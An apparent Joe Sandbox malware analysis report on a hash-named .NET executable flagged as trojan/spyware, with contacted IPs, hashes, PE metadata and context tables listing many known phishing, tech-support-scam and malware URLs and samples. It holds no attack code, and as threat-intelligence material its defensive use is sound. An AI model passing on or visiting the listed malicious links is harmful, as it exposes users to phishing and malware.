https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev	chromecache_101.5.dr	false	URL Reputation: safe URL Reputation: safe	unknown
https://github.com/Thraka	chromecache_85.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aka.ms/MSBuildChallenge/T1?ocid=build24_csc_learnpromo_T1_cnl	chromecache_101.5.dr	false	Avira URL Cloud: safe	unknown
https://github.com/dotnet/docs/issues	chromecache_85.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://polymer.github.io/PATENTS.txt	chromecache_101.5.dr	false	URL Reputation: safe	unknown
https://aka.ms/certhelp	chromecache_101.5.dr	false	URL Reputation: safe	unknown
https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/	chromecache_85.5.dr	false	Avira URL Cloud: safe	unknown
https://www.linkedin.com/cws/share?url=$	chromecache_101.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aka.ms/ContentUserFeedback	chromecache_85.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/mairaw	chromecache_85.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://schema.org	chromecache_101.5.dr	false	URL Reputation: safe	unknown
http://polymer.github.io/LICENSE.txt	chromecache_101.5.dr	false	URL Reputation: safe	unknown
https://github.com/Youssef1313	chromecache_85.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://polymer.github.io/AUTHORS.txt	chromecache_101.5.dr	false	URL Reputation: safe	unknown
https://aka.ms/banner_mslearn_tier1?wt.mc_id=build24_t1_learnpromotion_events	chromecache_101.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aka.ms/yourcaliforniaprivacychoices	chromecache_85.5.dr	false	URL Reputation: safe	unknown
https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml	chromecache_85.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/nschonni	chromecache_85.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://management.azure.com/subscriptions?api-version=2016-06-01	chromecache_101.5.dr	false	URL Reputation: safe	unknown
https://github.com/adegeo	chromecache_85.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md	chromecache_85.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aka.ms/pshelpmechoose	chromecache_101.5.dr	false	URL Reputation: safe	unknown
https://aka.ms/feedback/report?space=61	chromecache_85.5.dr, chromecache_75.5.dr, chromecache_106.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/jonschlinkert/is-plain-object	chromecache_101.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://octokit.github.io/rest.js/#throttling	chromecache_101.5.dr	false	URL Reputation: safe	unknown
https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2017-0	chromecache_101.5.dr	false	URL Reputation: safe	unknown
https://github.com/js-cookie/js-cookie	chromecache_101.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://learn-video.azurefd.net/vod/player	chromecache_101.5.dr	false	URL Reputation: safe	unknown
https://twitter.com/intent/tweet?original_referer=$	chromecache_101.5.dr	false	URL Reputation: safe	unknown
https://github.com/$	chromecache_101.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/gewarren	chromecache_85.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schema.org/Organization	chromecache_85.5.dr	false	URL Reputation: safe	unknown
http://polymer.github.io/CONTRIBUTORS.txt	chromecache_101.5.dr	false	URL Reputation: safe	unknown
https://channel9.msdn.com/	chromecache_101.5.dr	false	URL Reputation: safe	unknown
https://www.linkedin.com/profile/add?startTask=CERTIFICATION_NAME&name=$	chromecache_101.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://learn-video.azurefd.net/	chromecache_101.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/dotnet/try	chromecache_101.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.107.246.45	part-0017.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.246.60	part-0032.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
216.58.206.36	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false

Private

IP
192.168.2.6

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1447642
Start date and time:	2024-05-26 09:46:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	0pF5Vz4xG4.exe renamed because original name is a hash value
Original Sample Name:	850932bf796d17da05dc8c531993db6423b56686ff7dc68cc0a802e87f827fad.exe
Detection:	MAL
Classification:	mal96.troj.spyw.evad.winEXE@25/59@8/5
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.19.105.250, 142.250.185.227, 142.250.185.110, 108.177.15.84, 184.30.22.94, 34.104.35.123, 104.75.90.128, 2.19.126.136, 2.19.126.137, 216.58.206.74, 172.217.18.106, 142.250.185.74, 142.250.185.106, 142.250.185.138, 142.250.186.170, 142.250.186.138, 142.250.185.202, 216.58.206.42, 142.250.185.170, 216.58.212.138, 142.250.185.234, 142.250.186.106, 142.250.181.234, 142.250.184.234, 172.217.16.202, 68.219.88.97, 104.46.162.227, 13.107.21.237, 204.79.197.237, 93.184.221.240, 192.229.221.95, 104.208.16.88, 142.250.181.227, 2.16.164.74, 2.16.164.99, 142.250.186.46
Excluded domains from analysis (whitelisted): aijscdn2.afd.azureedge.net, slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, learn.microsoft.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, go.microsoft.com, clients2.google.com, ocsp.digicert.com, onedscolprdaus03.australiasoutheast.cloudapp.azure.com, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, c-bing-com.dual-a-0034.a-msedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, onedscolprdcus08.centralus.cloudapp.azure.com, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, aijscdn2.azureedge.net, browser.events.data.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, c.bing.com, learn-public.trafficmanager.net, go.microsoft.com.edgekey.net, dual-a-0034.a-msedge.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Input	Output
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Perplexity: mixtral-8x7b-instruct	{ "loginform": false, "reasons": [ "No input fields for username or password were found in the text.", "No submit button was found in the text.", "The text primarily discusses .NET Framework troubleshooting and documentation." ] }
x Register now > May 21 -June 21.2024 Ill Learn Discover v Product documentation v Development languages v Topics v Q Sign in .NET Languages Features Workloads Troubleshooting Resources Download .NET Filter by title Additional resources Learn / .NET / .NET Framework documentation "This application could not be Overview of .NET Framework Training started" error when running a > Get started Learning path v Installation guide Build .NET applications with C# - Training .NET Framework application .NET is a free, cross-platform, open source Overview developer platform for building many For developers different types of applications. With .NET,... Feedback Article 02/16/2023 6 contributors > By OS version Repair .NET framework In this article v TroubleshcHJt How to fix the error TroubleshcHJt install and uninstall See also Troubleshoot 'This application could not be started' When you attempt to run a .NET Framework application, you may receive the "This .NET Framework 3.5 on Windows 8 application could not be started" error message. When this error is caused by an through Windows 11 installed version of .NET Framework not being detected, or by .NET Framework .NET Framework 1.1 on Windows 8 being corrupted, use this article to try to solve that problem. through Windows 11 mt.exe - This application could not be started. > Migration guide Development guide This application could not be started, > Tools > Additional APIs Do you want to view information about this issue?
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: gpt-4o	```json { "riskscore": 0, "reasons": "The provided JavaScript code does not exhibit any malicious behavior. It primarily consists of configuration data for a web page, including localization settings, feedback options, and contributor information. There are no suspicious operations, data exfiltration, or unauthorized access attempts present in the code." }
var msDocs = { data: { timeOrigin: Date.now(), contentLocale: 'en-us', contentDir: 'ltr', userLocale: 'en-us', userDir: 'ltr', pageTemplate: 'Conceptual', brand: '', context: { }, hasBinaryRating: true, hasGithubIssues: false, feedbackHelpLinkType:'', feedbackHelpLinkUrl:'', standardFeedback: false, showFeedbackReport: false, enableTutorialFeedback: false, feedbackSystem: 'OpenSource', feedbackGitHubRepo: 'dotnet/docs', feedbackProductUrl: 'https://aka.ms/feedback/report?space=61', extendBreadcrumb: false, isEditDisplayable: true, hideViewSource: false, hasPageActions: true, hasPrintButton: true, hasBookmark: true, hasShare: true, isPermissioned: false, isPrivateUnauthorized: false, hasRecommendations: true, openSourceFeedback: true, openSourceFeedbackIssueUrl: 'https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml', openSourceFeedbackIssueTitle: '', openSourceFeedbackIssueLabels: '', contributors: [ { name: "adegeo", url: "https://github.com/adegeo" }, { name: "Youssef1313", url: "https://github.com/Youssef1313" }, { name: "gewarren", url: "https://github.com/gewarren" }, { name: "Thraka", url: "https://github.com/Thraka" }, { name: "mairaw", url: "https://github.com/mairaw" }, { name: "nschonni", url: "https://github.com/nschonni" } ], mathjax: { }, }, functions:{} };
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Perplexity: mixtral-8x7b-instruct	{ "loginform": false, "reasons": [ "No input fields for username or password were found in the text.", "No 'Sign in', 'Log in', or similar submit button was found in the text.", "The text primarily discusses .NET Framework troubleshooting and documentation." ] }
x Register now > May 21 -June 21.2024 Ill Learn Discover v Product documentation Q Sign in Development languages v Topics v .NET Languages Features Workloads Troubleshooting Resources Download .NET Filter by title Additional resources Learn / .NET / .NET Framework documentation "This application could not be Overview of .NET Framework Training started" error when running a > Get started Learning path v Installation guide Build .NET applications with C# - Training .NET Framework application .NET is a free, cross-platform, open source Overview developer platform for building many For developers different types of applications. With .NET,... Feedback Article 02/16/2023 6 contributors > By OS version Repair .NET framework In this article v TroubleshcHJt How to fix the error TroubleshcHJt install and uninstall See also Troubleshoot 'This application could not be started' When you attempt to run a .NET Framework application, you may receive the "This .NET Framework 3.5 on Windows 8 application could not be started" error message. When this error is caused by an through Windows 11 installed version of .NET Framework not being detected, or by .NET Framework .NET Framework 1.1 on Windows 8 being corrupted, use this article to try to solve that problem. through Windows 11 mt.exe - This application could not be started. > Migration guide Development guide This application could not be started, > Tools > Additional APIs Do you want to view information about this issue?
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Perplexity: mixtral-8x7b-instruct	{ "loginform": false, "reasons": [ "The text does not contain any input fields for a username or password.", "The text does not contain any buttons that can be used to submit a login request.", "The text does not contain any prompts or instructions for logging in." ] }
x Register now > May 21 -June 21.2024 Learn Discover Product documentation v Development languages v Topics v Q Sign in .N ET Languages Features Workloads Download .NET Troubleshooting Resources Filter by title Learn / .NET / .NET Framework documentation "This application could not be Overview of .NET Framework started" error when running a .NET > Get started v Installation guide Framework application Overview For developers 8-3 Feedback Article 02/16/2023 6 contributors > By OS version Repair .NET framework In this article v TroubleshcHJt How to fix the error TroubleshcHJt install and uninstall See also Troubleshoot 'This application could not be started' When you attempt to run a .NET Framework application, you may receive the "This .NET Framework 3.5 on Windows 8 application could not be started" error message. When this error is caused by an installed through Windows 11 version of .NET Framework not being detected, or by .NET Framework being corrupted, use this article to try to solve that problem. .NET Framework 1.1 on Windows 8 through Windows 11 mt.exe - This application could not be started. > Migration guide Download PDF This application could not be started,

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
239.255.255.250	UrfBRh4Hs5.exe	Get hash	malicious	AsyncRAT	Browse
	https://newsklikdisini5bekbg0.3bsz4.xyz/	Get hash	malicious	Unknown	Browse
	https://support-ads-team-34d19.firebaseapp.com/form-2122.html	Get hash	malicious	Unknown	Browse
	http://surl.pk/rUrcX	Get hash	malicious	Unknown	Browse
	https://steamcomunmnity.com/app/1648413/STALKER_2_Heert_of_Chornobyl	Get hash	malicious	Unknown	Browse
	http://t.service.isuzucoco.com/t.aspx/subid/169037213/camid/1623402/linkid/321020/Default.aspx	Get hash	malicious	Unknown	Browse
	https://support-ads-team-34d19.web.app/form-2122.html	Get hash	malicious	Unknown	Browse
	https://apply-remove.github.io/update_verify_fb/second.html	Get hash	malicious	Unknown	Browse
	http://dkc2006.github.io/HunarIntern-project-3/	Get hash	malicious	Unknown	Browse
	https://topicbiker.yachts/	Get hash	malicious	HTMLPhisher	Browse
13.107.246.45	swift.xls	Get hash	malicious	Unknown	Browse
	http://azuremail.ca/passerelle.php?id_envoi_courriel=5806909&lien=//xenbel.net/checker2	Get hash	malicious	HTMLPhisher	Browse
	https://link.elliottscotthr.com/api/redirect.me?track=000000&url=https%3A%2F%2Fwww.atjehupdate.com/3tvdgh	Get hash	malicious	HTMLPhisher	Browse
	https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4	Get hash	malicious	HTMLPhisher	Browse
	Invoice for 23-05-24 halboutevents.com-infected.html	Get hash	malicious	HTMLPhisher	Browse
	Updated-IT1_Individual_Resident_Return_XLS-18.0.9-2024.xls.xls	Get hash	malicious	Unknown	Browse
	https://pub-a2527e0fc1774b399011ecd14755d452.r2.dev/0nlinedoc.html	Get hash	malicious	HTMLPhisher	Browse
	Overview 2023.html	Get hash	malicious	Unknown	Browse
	https://filetransfer.io/data-package/sikJT8Pb/download	Get hash	malicious	HTMLPhisher	Browse
	http://bafybeicyoou3q7k5bml4hx2cqyi7ytj76vckg4hfeuvxbwxh3uw3qlhwwu.ipfs.cf-ipfs.com/	Get hash	malicious	HTMLPhisher	Browse
13.107.246.60	http://trq21files6468h65fdtr65g67h85deploy869.pages.dev/	Get hash	malicious	TechSupportScam	Browse
	https://cas5-0-urlprotect.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fgoogle.jp%2famp%2fs%2fjbx.silsbeekiaimports.us&umid=7eb8d47e-9d0c-47da-ae2a-8c43fe69fc7e&auth=6c94a71134cc7c92741d5538b555b091522e5e80-6d0e2f552f3dd2ebe4b30ade9b482f57c85f8c8f#Z2F5bGVAc2hyZXZlcG9ydGNoYW1iZXIub3Jn%2Fhc%2Farticles%2F360001376909%3Futm_campaign%3Dorder-confirmation-transactional%26utm_source%3Dblueshift%26utm_medium%3Demail%26utm_content%3Dtest-new-prod-recs-v2-lousersed-transactional-order-confirmation&d=DwMFaQ	Get hash	malicious	HTMLPhisher	Browse
	https://public-usa.mkt.dynamics.com/api/orgs/73621b0f-9313-ef11-9f85-00224806e526/r/WKmfOruHV0W6ncX4hUVNngQAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fprinttechsurl.com%252F%253Fkvifjwdf%2526qrc%253Dbmitts%2540highlandfunds.com%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%221%22%3Anull%7D%7D&digest=iyIjxuY%2BqqaAcbuKe8o9oixwHYyorXvjpRbJyVpqnp8%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15ee	Get hash	malicious	HTMLPhisher	Browse
	https://winrocket07.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse
	https://20maymic17.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse
	https://serviappnrems122.z20.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse
	https://moldmakersinv-my.sharepoint.com/:f:/g/personal/tom_goodall_accordmfg_com/Eol0o11bEfNJhII1rKAZv-UBXeuyLTNJQzZrHmlW9Cvs2w?e=vBJdwv	Get hash	malicious	HTMLPhisher	Browse
	https://myworkspacea6b75.myclickfunnels.com/onlinereview--31c6e?preview=true	Get hash	malicious	HTMLPhisher	Browse
	https://pub-75a5f4aa70c34156a65ab11f6988b245.r2.dev/mount.html	Get hash	malicious	HTMLPhisher	Browse
	https://09-k.jimdosite.com/	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
part-0017.t-0009.t-msedge.net	swift.xls	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://azuremail.ca/passerelle.php?id_envoi_courriel=5806909&lien=//xenbel.net/checker2	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://link.elliottscotthr.com/api/redirect.me?track=000000&url=https%3A%2F%2Fwww.atjehupdate.com/3tvdgh	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4	Get hash	malicious	HTMLPhisher	Browse	13.107.213.45
	undelivered messages.htm	Get hash	malicious	HTMLPhisher	Browse	13.107.213.45
	Invoice for 23-05-24 halboutevents.com-infected.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	Updated-IT1_Individual_Resident_Return_XLS-18.0.9-2024.xls.xls	Get hash	malicious	Unknown	Browse	13.107.246.45
	sample.html	Get hash	malicious	HTMLPhisher	Browse	13.107.213.45
	https://pub-a2527e0fc1774b399011ecd14755d452.r2.dev/0nlinedoc.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	Overview 2023.html	Get hash	malicious	Unknown	Browse	13.107.246.45
part-0032.t-0009.t-msedge.net	Invoice for 23-05-24 halboutevents.com-infected.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	https://filetransfer.io/data-package/sikJT8Pb/download	Get hash	malicious	HTMLPhisher	Browse	13.107.213.60
	http://trq21files6468h65fdtr65g67h85deploy869.pages.dev/	Get hash	malicious	TechSupportScam	Browse	13.107.246.60
	https://cas5-0-urlprotect.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fgoogle.jp%2famp%2fs%2fjbx.silsbeekiaimports.us&umid=7eb8d47e-9d0c-47da-ae2a-8c43fe69fc7e&auth=6c94a71134cc7c92741d5538b555b091522e5e80-6d0e2f552f3dd2ebe4b30ade9b482f57c85f8c8f#Z2F5bGVAc2hyZXZlcG9ydGNoYW1iZXIub3Jn%2Fhc%2Farticles%2F360001376909%3Futm_campaign%3Dorder-confirmation-transactional%26utm_source%3Dblueshift%26utm_medium%3Demail%26utm_content%3Dtest-new-prod-recs-v2-lousersed-transactional-order-confirmation&d=DwMFaQ	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4	Get hash	malicious	HTMLPhisher	Browse	13.107.213.60
	https://m.exactag.com/ai.aspx?tc=d9069973bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Atvlasestrellas.com%2Fxb%2F97956%2F%2FYy5tdXNjYXRAYW5kYXJpYS5jb20=	Get hash	malicious	HTMLPhisher	Browse	13.107.213.60
	https://public-usa.mkt.dynamics.com/api/orgs/73621b0f-9313-ef11-9f85-00224806e526/r/WKmfOruHV0W6ncX4hUVNngQAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fprinttechsurl.com%252F%253Fkvifjwdf%2526qrc%253Dbmitts%2540highlandfunds.com%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%221%22%3Anull%7D%7D&digest=iyIjxuY%2BqqaAcbuKe8o9oixwHYyorXvjpRbJyVpqnp8%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15ee	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	Re_ Bridge Drainage Enquiry.eml	Get hash	malicious	HTMLPhisher	Browse	13.107.213.60
	https://m.exactag.com/ai.aspx?tc=d9069973bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Aroyalweddingsktm.com%2Fimgs%2F37534%2Fsin3qp16kb%2FbWFyYy5zbWl0aEB6YmV0YS5jb20=	Get hash	malicious	HTMLPhisher	Browse	13.107.213.60
	https://open.memb.theofficialboard.com/259/42780/c/1000/qW0e==AO2czN1EmMyIDZiJmMykzYwYjZ2QTO0IDZkNGNzUzYj9SZ2lGd1NWZ4V2LyZmLkJXYvJGbhl2YpZmZvVGa05yd3d3LvoDc0RHaj7zmQzvQrZhYUmR6U8gNT1zzqhEU08h8Mvuop0dgR2BEdDs2bzkgPsituVOQ-UYJE241FjvVmRdF8l_RYrsWeydgWxMbNLC1e-3BI-mklFUF5BQlQG3GO2XJaBqa	Get hash	malicious	Unknown	Browse	13.107.213.60

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	UrfBRh4Hs5.exe	Get hash	malicious	AsyncRAT	Browse	13.107.213.61
	wyZ1vPGwGw.elf	Get hash	malicious	Unknown	Browse	52.167.95.232
	QN5PrDr5St.elf	Get hash	malicious	Unknown	Browse	20.216.223.73
	h73eD4sruD.elf	Get hash	malicious	Unknown	Browse	20.174.103.2
	M2Vf6ASl3g.elf	Get hash	malicious	Unknown	Browse	104.210.176.26
	wNJM6XQwaZ.elf	Get hash	malicious	Unknown	Browse	20.10.177.167
	SjLTg00G6b.elf	Get hash	malicious	Mirai	Browse	40.115.125.68
	mKBZo65Fcb.elf	Get hash	malicious	Mirai	Browse	20.71.144.219
	file.exe	Get hash	malicious	SystemBC	Browse	20.6.97.20
	la.bot.arm7.elf	Get hash	malicious	Unknown	Browse	20.247.62.5
MICROSOFT-CORP-MSN-AS-BLOCKUS	UrfBRh4Hs5.exe	Get hash	malicious	AsyncRAT	Browse	13.107.213.61
	wyZ1vPGwGw.elf	Get hash	malicious	Unknown	Browse	52.167.95.232
	QN5PrDr5St.elf	Get hash	malicious	Unknown	Browse	20.216.223.73
	h73eD4sruD.elf	Get hash	malicious	Unknown	Browse	20.174.103.2
	M2Vf6ASl3g.elf	Get hash	malicious	Unknown	Browse	104.210.176.26
	wNJM6XQwaZ.elf	Get hash	malicious	Unknown	Browse	20.10.177.167
	SjLTg00G6b.elf	Get hash	malicious	Mirai	Browse	40.115.125.68
	mKBZo65Fcb.elf	Get hash	malicious	Mirai	Browse	20.71.144.219
	file.exe	Get hash	malicious	SystemBC	Browse	20.6.97.20
	la.bot.arm7.elf	Get hash	malicious	Unknown	Browse	20.247.62.5

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	UrfBRh4Hs5.exe	Get hash	malicious	AsyncRAT	Browse	2.19.104.72 20.12.23.50
	https://newsklikdisini5bekbg0.3bsz4.xyz/	Get hash	malicious	Unknown	Browse	2.19.104.72 20.12.23.50
	https://support-ads-team-34d19.firebaseapp.com/form-2122.html	Get hash	malicious	Unknown	Browse	2.19.104.72 20.12.23.50
	https://steamcomunmnity.com/app/1648413/STALKER_2_Heert_of_Chornobyl	Get hash	malicious	Unknown	Browse	2.19.104.72 20.12.23.50
	http://t.service.isuzucoco.com/t.aspx/subid/169037213/camid/1623402/linkid/321020/Default.aspx	Get hash	malicious	Unknown	Browse	2.19.104.72 20.12.23.50
	https://support-ads-team-34d19.web.app/form-2122.html	Get hash	malicious	Unknown	Browse	2.19.104.72 20.12.23.50
	https://apply-remove.github.io/update_verify_fb/second.html	Get hash	malicious	Unknown	Browse	2.19.104.72 20.12.23.50
	http://dkc2006.github.io/HunarIntern-project-3/	Get hash	malicious	Unknown	Browse	2.19.104.72 20.12.23.50
	https://topicbiker.yachts/	Get hash	malicious	HTMLPhisher	Browse	2.19.104.72 20.12.23.50
	https://etsxt.shop/	Get hash	malicious	Unknown	Browse	2.19.104.72 20.12.23.50

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	35005
Entropy (8bit):	7.980061050467981
Encrypted:	false
SSDEEP:	768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
MD5:	522037F008E03C9448AE0AAAF09E93CB
SHA1:	8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
SHA-256:	983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
SHA-512:	643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.\|.n..]..m..`W..W.H.~..\|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y\|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il\|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......\|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	1.5031091030174428
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	0pF5Vz4xG4.exe
File size:	6'596'488 bytes
MD5:	769a1873247d5024808cf7bd70555b01
SHA1:	2e55be1191affa933438890fc34eb31136bef045
SHA256:	850932bf796d17da05dc8c531993db6423b56686ff7dc68cc0a802e87f827fad
SHA512:	2a1b089200374f89728e8203d34c5aa23b1d6519dc6bb662d10dbbd8e65e4247f73abc1b77af8643ff69d07590caf2d5b9148b260e39b84b71b979486b49733b
SSDEEP:	12288:7KkAmLeYTYzVtPJpBDaY2V52VpKkAmLeYTYzO:OZBtPJHDaXZK
TLSH:	7666960177F92608F2B35FF1EDFA999406B6FD22DE01CA6E0944604D9862B45CC7BB27
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......c.........."...................... ....@...... ........................d...........@...@......@............... .....

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x63E41DD5 [Wed Feb 8 22:10:29 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
